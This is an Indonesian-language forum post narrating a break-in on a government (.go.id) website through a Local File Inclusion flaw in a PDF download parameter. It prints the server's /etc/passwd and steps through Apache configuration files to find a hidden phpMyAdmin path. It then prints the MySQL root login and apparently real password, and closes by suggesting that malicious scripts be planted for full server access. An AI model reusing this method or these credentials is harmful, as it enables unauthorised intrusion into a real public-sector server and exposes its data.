assalamualaikum... langsung saja...
Saya akan mempergunakan bug sederhana pada situs .go.id, Local File Inclusion,
kalo saya bilang mungkin eksekusinya paling hanya beberapa menit saja :D Tapi
sekali lagi yang saya titik beratkan disini adalah pola berfikir kritisnya :)
Waktu itu saya sedang browsing mencari satu artikel pada salah satu situs
pemerintah
[You must be registered and logged in to see this link.] nah artikel yang saya cari ternyata bisa
didownload berbentuk pdf di url ini
-
[You must be registered and logged in to see this link.]disitu saya liat url untuk mendownloadnya adalah
-
[You must be registered and logged in to see this link.]Pemikiran iseng mulai muncul, bagaimana jika namafile=WDR_2008_eng_web.pdf saya
ganti menjadi sesuatu.
-
[You must be registered and logged in to see this link.]nah WDR_2008_eng_web.pdf saya ubah menjadi blablu.pdf, ternyata aplikasi web
tadi memperbolehkan saya untuk mendownload blablu.pdf seolah2 file tersebut
ada, lalu saya ingin mencoba memasukkan path system
-
[You must be registered and logged in to see this link.]ternyata dia mendownload file juga, tapi isinya kosong, saya asumsikan bahwa
aplikasi diberikan permission yang cukup tinggi untuk mengakses file2 sensitif
pada server, saya trial and error aja jika begitu, sehingga mencapai url
-
[You must be registered and logged in to see this link.]nah disini akhirnya file passwd terdownload dengan sempurna
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
aman:*:1001:1001:User &:/home/aman:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
ya sudah, sampe di sini saya tidak akan memberikan URL lanjutannya, saya hanya
akan memberikan pola berpikir iseng saya
- step berikutnya saya berfikir, saya harus mencari dimana letak file2 sensitif
yang bermanfaat tentunya, karena posisi saya sedang berada di satu warnet
(anggaplah begitu) yang tidak memungkinkan saya menjalankan tools, scanner,
atau apalah yang semacamnya
- yang saya fikir pertama tentunya dimana letak konfigurasi webserver
- saya harus mengetahui versi dari web server, daemon web server, serta
operating sistem yang digunakan
- banyak situs di web yang bisa digunakan untuk mencari informasi ini, saya
dapatkan informasi bahwa OS nya adalah FreeBSD dengan Apache 2.2 sebagai
webserver
- Lalu saya googling dengen k/w "httpd.conf in freebsd apache 2.2" muncullah
hasil /usr/local/etc/apache22/httpd.conf
- Kemudian saya download httpd.conf dengan menggunakan metoda di atas, muncul
hasil file configurasi, disana saya garis bawahi ada satu baris informasi penting
# Virtual hosts
Include etc/apache22/extra/httpd-vhosts.conf
- Saya lanjutkan pencarian ke /usr/local/etc/apache22/extra/httpd-vhosts.conf
pada file tersebut saya melihat ada baris
<VirtualHost 192.xxx.1.xxx:80>
# <VirtualHost 222.xxx.11.xxx:80>
ServerAdmin
[You must be registered and logged in to see this link.] # DocumentRoot "/usr/local/www/apache22/data/web-somename__upload@07032009/portal"
DocumentRoot "/usr/local/www/apache22/data/portal2"
ServerName
[You must be registered and logged in to see this link.] Alias /db4dm1n /usr/local/www/apache22/phpMyAdmin
<Directory /usr/local/www/apache22/phpMyAdmin>
AllowOverride All
</Directory>
- nah berarti disitulah letak phpmyadminnya, beserta url untuk mengaksesnya
lalu bagaimana dengan login dan passwordnya? Phpmyadmin bukanlah suatu
aplikasi yang aneh, sebagian besar orang rata2 pernah menggunakannya secara
umum settingan default konfigurasi ada di /phpmyadmin direktori/config.inc.php
- Lalu saya lanjutkan ke /usr/local/www/apache22/phpMyAdmin/config.inc.php
dalam file tersebut ada informasi
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'sf7100sy';
- voila, anda dapat masuk ke dalam mysqladmin, menyelipkan script jahat untuk
mendapatkan full akses dari server tersebut
thx to om Anton Hilman